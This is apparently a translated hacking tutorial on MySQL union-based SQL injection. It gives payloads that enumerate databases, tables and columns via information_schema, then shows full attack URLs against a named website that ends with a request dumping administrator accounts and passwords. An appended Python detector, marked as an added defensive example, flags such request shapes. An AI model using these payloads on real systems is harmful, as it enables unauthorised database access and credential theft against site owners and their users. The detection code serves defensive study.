Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Enumerating this way, the admin_user table appeared at the fourth result.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
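
A defender-side check for the request shapes shown above, as an added example that is not part of the original post: it URL-decodes a query string, collapses the /**/ comments used in place of spaces, and reports which indicators (union select, information_schema views, hex-literal comparisons, concat inside a union) are present. The function names and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL inline comments (/**/ or /*text*/) are used above instead of whitespace.
_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
_SCHEMA_VIEW = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b")
_HEX_COMPARE = re.compile(r"=\s*0x[0-9a-f]{4,}")

def normalize(query_string):
    """URL-decode, lower-case, and turn inline comments into single spaces."""
    text = unquote_plus(query_string).lower()
    text = _INLINE_COMMENT.sub(" ", text)
    text = text.replace("/*", " ")  # unterminated trailing comment, as in "limit 0,1/*"
    return re.sub(r"\s+", " ", text).strip()

def classify(query_string):
    """Return the sorted indicators found in one query string."""
    text = normalize(query_string)
    hits = set()
    if _UNION_SELECT.search(text):
        hits.add("union-select")
    m = _SCHEMA_VIEW.search(text)
    if m:
        hits.add("information_schema." + m.group(1))
    if _HEX_COMPARE.search(text):
        hits.add("hex-literal-comparison")
    if "concat(" in text and "union-select" in hits:
        hits.add("concat-in-union")
    return sorted(hits)

def is_schema_enumeration(query_string):
    """High-confidence alert: union select combined with an information_schema view."""
    hits = classify(query_string)
    return "union-select" in hits and any(h.startswith("information_schema.") for h in hits)

# Constructed sample query strings (not taken from real logs).
SAMPLES = [
    "id=-1/**/union/**/select/**/1,TABLE_NAME,3/**/from/**/information_schema.TABLES"
    "/**/where/**/TABLE_SCHEMA=0x74657374/**/limit/**/1,1",
    "id=-1%2f%2a%2a%2funion%2f%2a%2a%2fselect%2f%2a%2a%2f1,schema_name,3"
    "%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.schemata",
    "q=student+union+select+committee+minutes",  # benign text containing the words
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(is_schema_enumeration(qs), classify(qs))
```

The benign third sample still matches union-select on its own, which is why the alert requires the information_schema reference as well.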